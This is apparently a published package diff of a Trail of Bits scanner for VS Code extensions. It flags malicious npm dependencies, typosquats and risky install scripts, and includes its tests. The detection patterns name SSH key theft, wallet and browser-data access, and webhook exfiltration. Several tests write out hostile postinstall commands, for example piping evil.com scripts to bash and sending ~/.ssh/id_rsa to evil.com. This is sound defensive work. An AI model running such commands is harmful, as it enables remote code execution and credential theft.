@trailofbits/vsix-audit 0.1.0

package/dist/scanner/checks/dependencies.js

@@ -0,0 +1,225 @@
+// Popular packages and their common typosquats
+const POPULAR_PACKAGES = new Map([
+    ["lodash", ["lodahs", "lodashs", "loadsh", "lodaash", "lo-dash", "lodassh"]],
+    ["express", ["expres", "expresss", "exprees", "xpress"]],
+    ["react", ["reect", "raect", "reactt", "reakt"]],
+    ["axios", ["axois", "axio", "axioss", "axiosjs"]],
+    ["moment", ["momment", "momnent", "momentjs"]],
+    ["webpack", ["webpak", "webpackk", "web-pack"]],
+    ["babel", ["babell", "bable", "babeel"]],
+    ["eslint", ["esslint", "eslnt", "eslintjs"]],
+    ["typescript", ["typscript", "tyepscript", "typescipt"]],
+    ["mongoose", ["mongose", "mongoos", "mongoosee"]],
+    ["jquery", ["jquerry", "jqeury", "jqueryjs", "jquery.js"]],
+    ["chalk", ["challk", "chaulk", "chak"]],
+    ["commander", ["comandar", "comander", "commanderjs"]],
+    ["request", ["reqest", "requets", "requestjs"]],
+    ["underscore", ["undrscore", "undescore", "underscorejs"]],
+    ["async", ["asnyc", "asyncjs", "asynic"]],
+    ["debug", ["debuf", "debgu", "debugjs"]],
+    ["uuid", ["uuuid", "uuidjs", "uiid"]],
+    ["dotenv", ["dtoenv", "dotenvjs", "dot-env"]],
+    ["cors", ["corss", "corsjs", "cros"]],
+    ["cross-env", ["crossenv", "cross-env.js", "cros-env"]],
+    ["mysql", ["mysqljs", "my-sql", "mysqll"]],
+    ["sqlite3", ["sqliter", "sqlite.js", "sqllite3"]],
+    ["openai", ["openai-api", "open-ai", "openaijs"]],
+    ["anthropic", ["anthropic-api", "anthopic", "antropic"]],
+    ["langchain", ["langchain-core", "lang-chain", "langchainjs"]],
+]);
+// Dangerous npm lifecycle scripts
+const DANGEROUS_SCRIPTS = [
+    "preinstall",
+    "postinstall",
+    "preuninstall",
+    "postuninstall",
+    "prepublish",
+    "postpublish",
+];
+// Patterns that indicate malicious script content
+const MALICIOUS_SCRIPT_PATTERNS = [
+    { pattern: /curl\s+.*\|\s*(ba)?sh/i, desc: "Downloads and executes remote script" },
+    { pattern: /wget\s+.*\|\s*(ba)?sh/i, desc: "Downloads and executes remote script" },
+    { pattern: /eval\s*\(.*\$\(/i, desc: "Eval with command substitution" },
+    { pattern: /node\s+-e\s+.*atob/i, desc: "Node.js eval with base64 decode" },
+    { pattern: /powershell.*-enc/i, desc: "Encoded PowerShell command" },
+    { pattern: /\bexec\s*\(.*http/i, desc: "Executes remote content" },
+    { pattern: /\.ssh\/id_/i, desc: "SSH key access" },
+    { pattern: /discord\.com\/api\/webhooks/i, desc: "Discord webhook (data exfiltration)" },
+    { pattern: /crypto.*wallet/i, desc: "Cryptocurrency wallet access" },
+    { pattern: /APPDATA.*Chrome/i, desc: "Chrome browser data access" },
+    { pattern: /\.credentials/i, desc: "Credential file access" },
+    { pattern: /keychain|keyring/i, desc: "System keychain access" },
+];
+function levenshteinDistance(a, b) {
+    const matrix = [];
+    for (let i = 0; i <= b.length; i++) {
+        matrix[i] = [i];
+    }
+    const firstRow = matrix[0];
+    if (!firstRow)
+        return 0;
+    for (let j = 0; j <= a.length; j++) {
+        firstRow[j] = j;
+    }
+    for (let i = 1; i <= b.length; i++) {
+        const currentRow = matrix[i];
+        const prevRow = matrix[i - 1];
+        if (!currentRow || !prevRow)
+            continue;
+        for (let j = 1; j <= a.length; j++) {
+            if (b.charAt(i - 1) === a.charAt(j - 1)) {
+                currentRow[j] = prevRow[j - 1] ?? 0;
+            }
+            else {
+                currentRow[j] = Math.min((prevRow[j - 1] ?? 0) + 1, // substitution
+                (currentRow[j - 1] ?? 0) + 1, // insertion
+                (prevRow[j] ?? 0) + 1);
+            }
+        }
+    }
+    return matrix[b.length]?.[a.length] ?? 0;
+}
+function checkTyposquatting(pkgName) {
+    const lowerName = pkgName.toLowerCase();
+    // First check known typosquats
+    for (const [popular, typos] of POPULAR_PACKAGES) {
+        if (typos.includes(lowerName)) {
+            return { target: popular, distance: 1 };
+        }
+    }
+    // Then check by edit distance for short package names
+    for (const [popular] of POPULAR_PACKAGES) {
+        // Only check if package name is similar length
+        if (Math.abs(pkgName.length - popular.length) > 2)
+            continue;
+        const distance = levenshteinDistance(lowerName, popular);
+        // Flag if edit distance is 1-2 and names are not identical
+        if (distance > 0 && distance <= 2 && lowerName !== popular) {
+            return { target: popular, distance };
+        }
+    }
+    return null;
+}
+export function checkMaliciousPackages(packageJson, maliciousPackages) {
+    const findings = [];
+    const allDeps = {
+        ...packageJson.dependencies,
+        ...packageJson.devDependencies,
+    };
+    for (const pkgName of Object.keys(allDeps)) {
+        if (maliciousPackages.has(pkgName.toLowerCase())) {
+            findings.push({
+                id: "MALICIOUS_NPM_PACKAGE",
+                title: "Known malicious npm package",
+                description: `Dependency "${pkgName}" is a known malicious npm package. This package has been identified in previous attacks and should be removed immediately.`,
+                severity: "critical",
+                category: "dependency",
+                location: {
+                    file: "package.json",
+                },
+                metadata: {
+                    package: pkgName,
+                },
+            });
+        }
+    }
+    return findings;
+}
+export function checkTyposquattingPackages(packageJson) {
+    const findings = [];
+    const allDeps = {
+        ...packageJson.dependencies,
+        ...packageJson.devDependencies,
+    };
+    for (const pkgName of Object.keys(allDeps)) {
+        const typosquat = checkTyposquatting(pkgName);
+        if (typosquat) {
+            findings.push({
+                id: "TYPOSQUAT_PACKAGE",
+                title: "Potential typosquatting package",
+                description: `Dependency "${pkgName}" is suspiciously similar to popular package "${typosquat.target}" (edit distance: ${typosquat.distance}). This may be a typosquatting attack.`,
+                severity: "high",
+                category: "dependency",
+                location: {
+                    file: "package.json",
+                },
+                metadata: {
+                    package: pkgName,
+                    similar_to: typosquat.target,
+                    edit_distance: typosquat.distance,
+                },
+            });
+        }
+    }
+    return findings;
+}
+export function checkLifecycleScripts(packageJson) {
+    const findings = [];
+    const scripts = packageJson.scripts ?? {};
+    for (const scriptName of DANGEROUS_SCRIPTS) {
+        const scriptContent = scripts[scriptName];
+        if (!scriptContent)
+            continue;
+        // Check for malicious patterns in the script
+        for (const { pattern, desc } of MALICIOUS_SCRIPT_PATTERNS) {
+            if (pattern.test(scriptContent)) {
+                findings.push({
+                    id: "MALICIOUS_LIFECYCLE_SCRIPT",
+                    title: `Suspicious ${scriptName} script`,
+                    description: `The ${scriptName} script contains suspicious content: ${desc}. Lifecycle scripts run automatically during npm install and can execute arbitrary code.`,
+                    severity: "critical",
+                    category: "dependency",
+                    location: {
+                        file: "package.json",
+                    },
+                    metadata: {
+                        script: scriptName,
+                        content: scriptContent.slice(0, 200),
+                        pattern: desc,
+                    },
+                });
+                break; // Only report one pattern per script
+            }
+        }
+        // Also flag any lifecycle script that exists even without malicious patterns
+        // as they're a common attack vector
+        if (!findings.some((f) => f.id === "MALICIOUS_LIFECYCLE_SCRIPT" && f.metadata?.["script"] === scriptName)) {
+            findings.push({
+                id: "LIFECYCLE_SCRIPT",
+                title: `Has ${scriptName} script`,
+                description: `The extension has a ${scriptName} script that runs during installation. While not always malicious, lifecycle scripts are a common attack vector. Review the script content carefully.`,
+                severity: "medium",
+                category: "dependency",
+                location: {
+                    file: "package.json",
+                },
+                metadata: {
+                    script: scriptName,
+                    content: scriptContent.slice(0, 200),
+                },
+            });
+        }
+    }
+    return findings;
+}
+export function checkDependencies(contents, zooData) {
+    const findings = [];
+    // Parse package.json from the extension
+    const packageJsonBuffer = contents.files.get("package.json");
+    if (!packageJsonBuffer) {
+        return findings;
+    }
+    let packageJson;
+    try {
+        packageJson = JSON.parse(packageJsonBuffer.toString("utf8"));
+    }
+    catch {
+        return findings;
+    }
+    findings.push(...checkMaliciousPackages(packageJson, zooData.maliciousNpmPackages));
+    findings.push(...checkTyposquattingPackages(packageJson));
+    findings.push(...checkLifecycleScripts(packageJson));
+    return findings;
+}
+//# sourceMappingURL=dependencies.js.map

package/dist/scanner/checks/dependencies.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"dependencies.js","sourceRoot":"","sources":["../../../src/scanner/checks/dependencies.ts"],"names":[],"mappings":"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"}

package/dist/scanner/checks/dependencies.test.d.ts

@@ -0,0 +1,2 @@
+export {};
+//# sourceMappingURL=dependencies.test.d.ts.map

package/dist/scanner/checks/dependencies.test.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"dependencies.test.d.ts","sourceRoot":"","sources":["../../../src/scanner/checks/dependencies.test.ts"],"names":[],"mappings":""}

package/dist/scanner/checks/dependencies.test.js

@@ -0,0 +1,248 @@
+import { describe, expect, it } from "vitest";
+import { checkDependencies, checkLifecycleScripts, checkMaliciousPackages, checkTyposquattingPackages, } from "./dependencies.js";
+function makePackageJson(content) {
+    return JSON.stringify(content, null, 2);
+}
+function makeContents(packageJsonContent) {
+    const manifest = {
+        name: "test-extension",
+        publisher: "test",
+        version: "1.0.0",
+    };
+    const files = new Map();
+    files.set("package.json", Buffer.from(makePackageJson(packageJsonContent), "utf8"));
+    return { manifest, files, basePath: "/test" };
+}
+function makeZooData(maliciousPackages = []) {
+    return {
+        blocklist: [],
+        hashes: new Set(),
+        domains: new Set(),
+        ips: new Set(),
+        maliciousNpmPackages: new Set(maliciousPackages.map((p) => p.toLowerCase())),
+    };
+}
+describe("checkMaliciousPackages", () => {
+    it("detects known malicious packages in dependencies", () => {
+        const packageJson = {
+            dependencies: {
+                express: "^4.0.0",
+                "event-stream": "^3.3.4",
+            },
+        };
+        const findings = checkMaliciousPackages(packageJson, new Set(["event-stream"]));
+        expect(findings).toHaveLength(1);
+        expect(findings.some((f) => f.id === "MALICIOUS_NPM_PACKAGE")).toBe(true);
+        expect(findings.some((f) => f.severity === "critical")).toBe(true);
+        expect(findings.some((f) => f.metadata?.["package"] === "event-stream")).toBe(true);
+    });
+    it("detects malicious packages in devDependencies", () => {
+        const packageJson = {
+            devDependencies: {
+                jest: "^29.0.0",
+                "ua-parser-js": "^0.7.0",
+            },
+        };
+        const findings = checkMaliciousPackages(packageJson, new Set(["ua-parser-js"]));
+        expect(findings).toHaveLength(1);
+        expect(findings.some((f) => f.metadata?.["package"] === "ua-parser-js")).toBe(true);
+    });
+    it("is case-insensitive", () => {
+        const packageJson = {
+            dependencies: {
+                "Event-Stream": "^3.3.4",
+            },
+        };
+        const findings = checkMaliciousPackages(packageJson, new Set(["event-stream"]));
+        expect(findings).toHaveLength(1);
+    });
+    it("returns empty array for clean dependencies", () => {
+        const packageJson = {
+            dependencies: {
+                express: "^4.0.0",
+                lodash: "^4.0.0",
+            },
+        };
+        const findings = checkMaliciousPackages(packageJson, new Set(["event-stream"]));
+        expect(findings).toHaveLength(0);
+    });
+});
+describe("checkTyposquattingPackages", () => {
+    it("detects known typosquats", () => {
+        const packageJson = {
+            dependencies: {
+                lodahs: "^4.0.0", // typosquat of lodash
+            },
+        };
+        const findings = checkTyposquattingPackages(packageJson);
+        expect(findings).toHaveLength(1);
+        expect(findings.some((f) => f.id === "TYPOSQUAT_PACKAGE")).toBe(true);
+        expect(findings.some((f) => f.severity === "high")).toBe(true);
+        expect(findings.some((f) => f.metadata?.["similar_to"] === "lodash")).toBe(true);
+    });
+    it("detects crossenv typosquat", () => {
+        const packageJson = {
+            dependencies: {
+                crossenv: "^7.0.0", // typosquat of cross-env
+            },
+        };
+        const findings = checkTyposquattingPackages(packageJson);
+        expect(findings).toHaveLength(1);
+        expect(findings.some((f) => f.metadata?.["similar_to"] === "cross-env")).toBe(true);
+    });
+    it("detects typosquats by edit distance", () => {
+        const packageJson = {
+            dependencies: {
+                expres: "^4.0.0", // 1 char different from express
+            },
+        };
+        const findings = checkTyposquattingPackages(packageJson);
+        expect(findings).toHaveLength(1);
+        expect(findings.some((f) => f.metadata?.["similar_to"] === "express")).toBe(true);
+        const finding = findings.find((f) => f.id === "TYPOSQUAT_PACKAGE");
+        const distance = finding?.metadata?.["edit_distance"];
+        expect(typeof distance === "number" && distance <= 2).toBe(true);
+    });
+    it("does not flag legitimate packages", () => {
+        const packageJson = {
+            dependencies: {
+                express: "^4.0.0",
+                lodash: "^4.0.0",
+                react: "^18.0.0",
+            },
+        };
+        const findings = checkTyposquattingPackages(packageJson);
+        expect(findings).toHaveLength(0);
+    });
+});
+describe("checkLifecycleScripts", () => {
+    it("detects postinstall script", () => {
+        const packageJson = {
+            scripts: {
+                postinstall: "echo 'installed'",
+            },
+        };
+        const findings = checkLifecycleScripts(packageJson);
+        expect(findings).toHaveLength(1);
+        expect(findings.some((f) => f.id === "LIFECYCLE_SCRIPT")).toBe(true);
+        expect(findings.some((f) => f.severity === "medium")).toBe(true);
+        expect(findings.some((f) => f.metadata?.["script"] === "postinstall")).toBe(true);
+    });
+    it("detects preinstall script", () => {
+        const packageJson = {
+            scripts: {
+                preinstall: "node setup.js",
+            },
+        };
+        const findings = checkLifecycleScripts(packageJson);
+        expect(findings).toHaveLength(1);
+        expect(findings.some((f) => f.metadata?.["script"] === "preinstall")).toBe(true);
+    });
+    it("detects malicious curl pipe to bash", () => {
+        const packageJson = {
+            scripts: {
+                postinstall: "curl https://evil.com/script.sh | bash",
+            },
+        };
+        const findings = checkLifecycleScripts(packageJson);
+        expect(findings).toHaveLength(1);
+        expect(findings.some((f) => f.id === "MALICIOUS_LIFECYCLE_SCRIPT")).toBe(true);
+        expect(findings.some((f) => f.severity === "critical")).toBe(true);
+    });
+    it("detects SSH key access in scripts", () => {
+        const packageJson = {
+            scripts: {
+                postinstall: "cat ~/.ssh/id_rsa | curl -d @- https://evil.com",
+            },
+        };
+        const findings = checkLifecycleScripts(packageJson);
+        const maliciousFinding = findings.find((f) => f.id === "MALICIOUS_LIFECYCLE_SCRIPT");
+        expect(maliciousFinding).toBeDefined();
+        expect(maliciousFinding?.metadata?.["pattern"]).toBe("SSH key access");
+    });
+    it("detects Discord webhook in scripts", () => {
+        const packageJson = {
+            scripts: {
+                postinstall: "curl -X POST https://discord.com/api/webhooks/123/abc -d 'stolen data'",
+            },
+        };
+        const findings = checkLifecycleScripts(packageJson);
+        const maliciousFinding = findings.find((f) => f.id === "MALICIOUS_LIFECYCLE_SCRIPT");
+        expect(maliciousFinding).toBeDefined();
+    });
+    it("ignores non-lifecycle scripts", () => {
+        const packageJson = {
+            scripts: {
+                build: "tsc",
+                test: "jest",
+                start: "node index.js",
+            },
+        };
+        const findings = checkLifecycleScripts(packageJson);
+        expect(findings).toHaveLength(0);
